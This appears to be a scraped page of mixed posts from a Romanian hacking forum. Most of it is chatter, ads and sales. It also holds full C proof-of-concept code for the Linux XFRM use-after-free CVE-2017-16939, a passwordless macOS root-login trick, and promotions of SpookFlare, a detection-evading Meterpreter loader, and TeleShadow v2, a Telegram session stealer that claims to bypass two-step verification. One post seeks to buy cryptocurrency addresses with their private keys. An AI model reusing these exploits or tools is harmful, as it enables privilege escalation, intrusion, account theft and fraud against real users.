Leaderboard

Try logging with the user "root" without a password on the latest ver of MacOS (try two times) https://mobile.twitter.com/lemiorhan/status/935581020774117381 LE: Already news https://www.laptopmag.com/articles/root-macos-high-sierra

In caz ca vrei sa te asiguri ca aspectul amoros al vietilor voastre este in concordanta cu cel social, recomand:

Baiat de nota 10, stie ce face. Recomand!

Vulnerability Summary The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem – XFRM. Netlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user space processes and an internal kernel API for kernel modules. Credit An independent security researcher, Mohamed Ghannam, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program Vendor reposnse The vulnerability has been addressed as part of 1137b5e (“ipsec: Fix aborted xfrm policy dump crash”) patch: CVE-2017-16939 @@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr static int xfrm_dump_policy_done(struct netlink_callback *cb) { - struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1]; + struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args; struct net *net = sock_net(cb->skb->sk); xfrm_policy_walk_done(walk, net); return 0; } +static int xfrm_dump_policy_start(struct netlink_callback *cb) +{ + struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args; + + BUILD_BUG_ON(sizeof(*walk) > sizeof(cb->args)); + + xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY); + return 0; +} + static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb) { struct net *net = sock_net(skb->sk); - struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1]; + struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args; struct xfrm_dump_info info; - BUILD_BUG_ON(sizeof(struct xfrm_policy_walk) > - sizeof(cb->args) - sizeof(cb->args[0])); - info.in_skb = cb->skb; info.out_skb = skb; info.nlmsg_seq = cb->nlh->nlmsg_seq; info.nlmsg_flags = NLM_F_MULTI; - if (!cb->args[0]) { - cb->args[0] = 1; - xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY); - } - (void) xfrm_policy_walk(net, walk, dump_one_policy, &info); return skb->len; @@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = { static const struct xfrm_link { int (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **); + int (*start)(struct netlink_callback *); int (*dump)(struct sk_buff *, struct netlink_callback *); int (*done)(struct netlink_callback *); const struct nla_policy *nla_pol; @@ -2487,6 +2490,7 @@ static const struct xfrm_link { [XFRM_MSG_NEWPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_add_policy }, [XFRM_MSG_DELPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy }, [XFRM_MSG_GETPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy, + .start = xfrm_dump_policy_start, .dump = xfrm_dump_policy, .done = xfrm_dump_policy_done }, [XFRM_MSG_ALLOCSPI - XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi }, @@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, { struct netlink_dump_control c = { + .start = link->start, .dump = link->dump, .done = link->done, }; Vulnerability details An unprivileged user can change Netlink socket subsystem – XFRM value sk->sk_rcvbuf (sk == struct sock object). The value can be changed into specific range via setsockopt(SO_RCVBUF). sk_rcvbuf is the total number of bytes of a buffer receiving data via recvmsg/recv/read. The sk_rcvbuf value is how many bytes the kernel should allocate for the skb (struct sk_buff objects). skb->trusize is a variable which keep track of how many bytes of memory are consumed, in order to not wasting and manage memory, the kernel can handle the skb size at run time. For example, if we allocate a large socket buffer (skb) and we only received 1-byte packet size, the kernel will adjust this by calling skb_set_owner_r. By calling skb_set_owner_r the sk->sk_rmem_alloc (refers to an atomic variable sk->sk_backlog.rmem_alloc) is modified. When we create a XFRM netlink socket, xfrm_dump_policy is called, when we close the socket xfrm_dump_policy_done is called. xfrm_dump_policy_done is called whenever cb_running for netlink_sock object is true. The xfrm_dump_policy_done tries to clean-up a xfrm walk entry which is managed by netlink_callback object. When netlink_skb_set_owner_r is called (like skb_set_owner_r) it updates the sk_rmem_alloc. netlink_dump(): In above snippet we can see that netlink_dump() check fails when sk->sk_rcvbuf is smaller than sk_rmem_alloc (notice that we can control sk->sk_rcvbuf via stockpot). When this condition fails, it jumps to the end of a function and quit with failure and the value of cb_running doesn’t changed to false. nlk->cb_running is true, thus xfrm_dump_policy_done() is being called. nlk->cb.done points to xfrm_dump_policy_done, it worth noting that this function handles a doubly linked list, so if we can tweak this vulnerability to reference a controlled buffer, we could have a read/write what/where primitive. Proof of concept The following proof of concept is for Ubuntu 17.04. #define _GNU_SOURCE #include <string.h> #include <stdio.h> #include <stdlib.h> #include <asm/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <linux/netlink.h> #include <linux/xfrm.h> #include <sched.h> #include <unistd.h> #define BUFSIZE 2048 int fd; struct sockaddr_nl addr; struct msg_policy { struct nlmsghdr msg; char buf[BUFSIZE]; }; void create_nl_socket(void) { fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM); memset(&addr,0,sizeof(struct sockaddr_nl)); addr.nl_family = AF_NETLINK; addr.nl_pid = 0; /* packet goes into the kernel */ addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */ } void do_setsockopt(void) { int var =0x100; setsockopt(fd,1,SO_RCVBUF,&var,sizeof(int)); } struct msg_policy *init_policy_dump(int size) { struct msg_policy *r; r = malloc(sizeof(struct msg_policy)); if(r == NULL) { perror("malloc"); exit(-1); } memset(r,0,sizeof(struct msg_policy)); r->msg.nlmsg_len = 0x10; r->msg.nlmsg_type = XFRM_MSG_GETPOLICY; r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST; r->msg.nlmsg_seq = 0x1; r->msg.nlmsg_pid = 2; return r; } int send_msg(int fd,struct nlmsghdr *msg) { int err; err = sendto(fd,(void *)msg,msg->nlmsg_len,0,(struct sockaddr*)&addr,sizeof(struct sockaddr_nl)); if (err < 0) { perror("sendto"); return -1; } return 0; } void create_ns(void) { if(unshare(CLONE_NEWUSER) != 0) { perror("unshare(CLONE_NEWUSER)"); exit(1); } if(unshare(CLONE_NEWNET) != 0) { perror("unshared(CLONE_NEWUSER)"); exit(2); } } int main(int argc,char **argv) { struct msg_policy *p; create_ns(); create_nl_socket(); p = init_policy_dump(100); do_setsockopt(); send_msg(fd,&p->msg); p = init_policy_dump(1000); send_msg(fd,&p->msg); return 0; } Source: https://blogs.securiteam.com/index.php/archives/3535

Te-a luat de prost, si te-a prostit si mai tare.Da-i un sut in cur si divorteaza, sigur vei gasi 100 de alte "pisi" ca ea pe care sa le plimbi cu meleul.

pune și report-ul https://www.virustotal.com/#/file/a04f84e48dda2639f04487f1c33c4d3e8260cd445b8099a7136bc6473da53dfa/detection https://www.hybrid-analysis.com/sample/a04f84e48dda2639f04487f1c33c4d3e8260cd445b8099a7136bc6473da53dfa?environmentId=100 pe site

https://www.google.ro/search?client=ms-android-google&q=intreruperea+caldurilor+la+scroafe&sa=X&ved=0ahUKEwjoxcKakN_XAhVRKewKHfnoCfEQ1QIIaygG&biw=412&bih=604&dpr=2.63

Web Development Limbaje WEB: PHP, Javascript Design: Bootstrap Template engine: Smarty Editare/Fixare/Optimizare: Wordpress Framework pentru scrapere: Simple HTML Dom Informatii -Accept proiecte de lunga durata cat si cele de scurta durata. -La orice proiect or sa se stabileasca toate detaliile la inceput cu clientul, nu se pot aduce new features pe durata proiectului.(Decat mici modificari) -Support-ul este FREE in totalitate. Prin support ma refer: instalare, fixare buguri, fixare MySQL, etc. -Preturile or sa fie stabilite in functie de timpul necesar proiectului si complexitatea sa. -Accept si job-uri unde primesc salariu lunar. -Accept si job-uri in care sunt platit pe ora. Portofoliu: -Ofer live preview la proiecte in privat sau prin TeamViewer(Nu am voie sa las link-ul companiilor dar pot arata poze.) Plata -BitCoin/Etherum -PayPal -Transfer Bancar -Paysafe Contact -ICQ: MOMENTANT NEDISPONIBIL -Telegram: @adicode -Skype: adicode32@outlook.com -Jabber: adicode@404.city **Nu lasa-ti mesaje gen "ti-am dat add", "cat m-ar costa?", "poti face asta?" in topic, va rog frumos. Astept orice intrebare in PM sau pe una din retelele de mai sus. Multumesc.

SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader generator for Meterpreter Reverse HTTP and HTTPS stages. SpookFlare has custom encrypter with string obfuscation and run-time code compilation features so you can bypass the countermeasures of the target systems like a boss until they “learn” the technique and behavior of SpookFlare payloads. Obfuscation Runtime Code Compiling Source Code Encryption Patched Meterpreter Stage Support ___ ___ ___ ___ _ __ ___ _ _ ___ ___ / __| _ \/ _ \ / _ \| |/ / | __| | /_\ | _ \ __| \__ \ _/ (_) | (_) | ' < | _|| |__ / _ \| / _| |___/_| \___/ \___/|_|\_\ |_| |____/_/ \_\_|_\___| Version : 1.0 Author : Halil Dalabasmaz WWW : artofpwn.com Twitter : @hlldz Github : @hlldz Licence : Apache License 2.0 Note : Stay in shadows! ------------------------------------------------------- [*] You can use "help" command for access help section. spookflare > help list : List payloads generate : Generate payloads exit : Exit from program [!] Important: Use x86 listener for x86 payloads and x64 listener for x64 payloads otherwise the process will crash! spookflare > list SpookFlare can generate following payloads. [*] Meterpreter Loader (.EXE) with Custom Encrypter and Custom Stub: - Meterpreter Reverse HTTP x86/x64 - Meterpreter Reverse HTTPS x86/x64 Technical Details https://artofpwn.com/spookflare.html Usage Video Download: SpookFlare-master.zip Source: https://github.com/hlldz/SpookFlare

Multumesc. UPDATE: Lucrez si cu wordpress acum, astept proiecte bazate pe aceasta platforma, nu caut proiecte lungi pe wordpress decat pe php.

Vand laptop HP Elitebook 2170p 11.6 inchi Procesor i5 3427U / 1.8 GHz turbo pana in 2.3 GHz Ram 8GB SSD 120GB Bateria tine 3 ore. Placa video integrata. Prezinta urme de utilizare. Fara defecte ascunse cer si ofer seriozitate. Pret 750 lei. Predare personala in Bucuresti sau livrare in tara (platesc eu curierul)

» ondevice ssh just like ssh, but for devices without public IP run commands and copy files just like you’d normally do with ssh, rsync, scp or sftp, no matter where your devices are sign up now and get 5 devices + 5GB/month for free! Sing Up Source: http://ondevice.io/

Ca tot e free for all in thread, oferta initiala ramane. Comision 10%.

net-Shield An Easy and Simple Anti-DDoS solution for VPS,Dedicated Servers and IoT devices based on iptables An Easy and Simple Anti-DDoS solution for VPS,Dedicated Servers and IoT devices based on iptables. Requirements Linux System with python, iptables Nginx (Will be installed automatically by install.sh) Quickstart Running as a standalone software (No install.sh required) via DryRun option (-dry) to only check connections agains ip/netsets and do not touch iptables firewall. python nshield-main.py -dry For complete install: cd /home/ && git clone https://github.com/fnzv/net-Shield.git && bash net-Shield/install.sh WARNING: This script will replace all your iptables rules and installs Nginx so take that into account Proxy Domains To configure proxydomains you need to enable the option on /etc/nshield/nshield.con (nshield_proxy: 1) and be sure that the proxydomain list (/etc/nshield/proxydomain ) is following this format: mysite.com 123.123.123.123 example.com 111.111.111.111 Usage The above quickstart/installation script will install python if not present and download all the repo with the example config files, after that will be executed a bash script to setup some settings and a cron that will run every 30 minutes to check connections against common ipsets. You can find example config files under examples folder. HTTPS Manually verification is executed with this command under the repository directory: python nshield-main.py -ssl The python script after reading the config will prompt you to insert an email address (For Let's Encrypt) and change your domain DNS to the nShield server for SSL DNS Challenge confirmation. Example: I Will generate SSL certs for sami.pw with Let's Encrypt DNS challenge Insert your email address? (Used for cert Expiration and Let's Encrypt TOS agreement samiii@protonmail.com Saving debug log to /var/log/letsencrypt/letsencrypt.log Renewing an existing certificate Performing the following challenges: dns-01 challenge for sami.pw ------------------------------------------------------------------------------- Please deploy a DNS TXT record under the name _acme-challenge.sami.pw with the following value: wFyeYk4yl-BERO6pKnMUA5EqwawUri5XnlD2-xjOAUk Once this is deployed, ------------------------------------------------------------------------------- Press Enter to Continue Waiting for verification... Cleaning up challenges Now your domain is verified and a SSL cert is issued to Nginx configuration and you can change your A record to this server. How it works Basically this python script is set by default to run every 30 minutes and check the config file to execute these operations: Get latest Bot,Spammers,Bad IP/Net reputation lists and blocks if those Bad guys are attacking your server (Thank you FireHol http://iplists.firehol.org/ ) Enables basic Anti-DDoS methods to deny unwanted/malicious traffic Rate limits when under attack Allows HTTP(S) Proxying to protect your site with an external proxy/server (You need to manually run SSL Verification first time) Demo https://asciinema.org/a/elow8qggzb7q6durjpbxsmk6r Download: net-Shield-master.zip Tested on Ubuntu 16.04 and 14.04 LTS Source: https://github.com/fnzv/net-Shield

Ce incredere sa mai aibe cand femeia il inseala cu el de mana?...

Update TeleShadow v2 Video : https://telegram.me/parsingteam/3311 What features does it have? Support SMTP Transport! Support Telegram API Transport! Support FakeMessage! Support Custom Icon! Bypass Two-step confirmation Bypass Inherent identity and need 5-digit verification code Support for the official telegram desktop only windows ! Download:TeleShadow2-master.zip Credits and author: https://github.com/ParsingTeam/TeleShadow2#thanks-to

@deauxefeforsaken nu stiu daca ti-ai dat seama, dar primesti sfaturi de casnicie de la unii carora le-ai putea fi tata, ca asa e romanul, expert in toate. Daca ai venit pentru sfaturi de "tech", in locul tau m-as limita la ele. Si apoi 2 lucruri, orice faci mai departe: 1. Sa nu ajungi pe mana asa-zisei "justitii" din Rromania caci e o mizerie incredibila 2. Sa poti dormi apoi noaptea, sa te suporti pe tine insuti (sa ai constiinta curata) Spor!

Do anyone have Knoxss tool reference : https://knoxss.me/

Combinatie Perfecta : 1 Bucata VPS ( centos 6.7 + < 7.00 ) 2 Centos Web Panel instalat cd /usr/local/src wget http://centos-webpanel.com/cwp-latest sh cwp-latest 3 Accesand : ip:2030/index.php?module=letsencrypt veti da de un meniu Letsencrypt Manager [INSTALLED] By Installing Letsencrypt you will be able to install free Letsencrypt SSL certificates. Letsencrypt certificates are autorenew'ed daily by the cronjob, Autorenew status [INSTALLED] Concluzie : Prin cativa pasi va puteti instala un manager de certificate ssl gratuit si puteti transforma http in https ...

Cumpar bulk adrese folosite de bitcoin, litecoin si doge Fara balanta Cu private key. Adresele trebuie sa fie din 2014 sau inainte de 2014 Bulk= 100 -1000-10,000, etc adrese Plata btc